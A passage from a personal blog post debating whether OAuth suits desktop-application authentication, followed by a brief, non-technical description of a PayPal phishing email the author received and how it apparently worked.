Last night, Stuart and I were having
a little argument about the merits of OAuth and whether it is actually
suitable for what we are using it for (authenticating destop applications
to access a service), as I am not particularly fond of it, and I was working
on support for OAuth 1.0a. Stuart's argument is that user's trust the browser,
and we need some piece of trust in the system, and OAuth provides that as it
pretty much requires a browser to use it. But I don't really think users trust
their browser (as so many
don't even know what a
browser is), but instead, what they trust is the site they're looking at.
The browser doesn't even exist. It's just this inherent part of the system
that you have to use. To most people it's The Internet, or the giant
blue e, or a compass. The browser has no real meaning to them. It's the place
they have to go to search for things, and access information. And Humans have
two very important attributes. They are both very prone to error, and very
resilient. People will keep going to the web, despite all its problems with
poorly designed sites, and crashing browsers, and broken plug-ins, because
they need to get at the information they're looking for. And they will
very often type their password in the wrong place, or mistake a phishing site
for a real site. No amount of code will fix this. And nothing that requires a
Human to do something will guarantee security and authenticity. It will only
create annoyances that Humans will optimize around.
As a specific example. I received a PayPal phishing mail in my Inbox this
morning. It's a pretty nifty attempt at getting credit info, too. It includes
an HTML form attachment, which POSTs to PHP script that was implanted on
http://ag-exchange.com/, presumably by
compromising either Apache, PHP, or some other module their server is using.
It appears to be a simple script which just reads the POST data, and redirects
the user to the PayPal About Us page. The HTML form requires javascript
and has a little card number validation method it seems, to avoid getting bad
data. The mail was sent to my alias on gnome.org, and apparently got sent by
taking advantage of an SMTP relay with a broken configuration. Of course, the
SMTP server may have also been compromised and just had the configuration
changed to allow open relay as well, but I suspect it was probably just open
already. And that mail server belongs to
|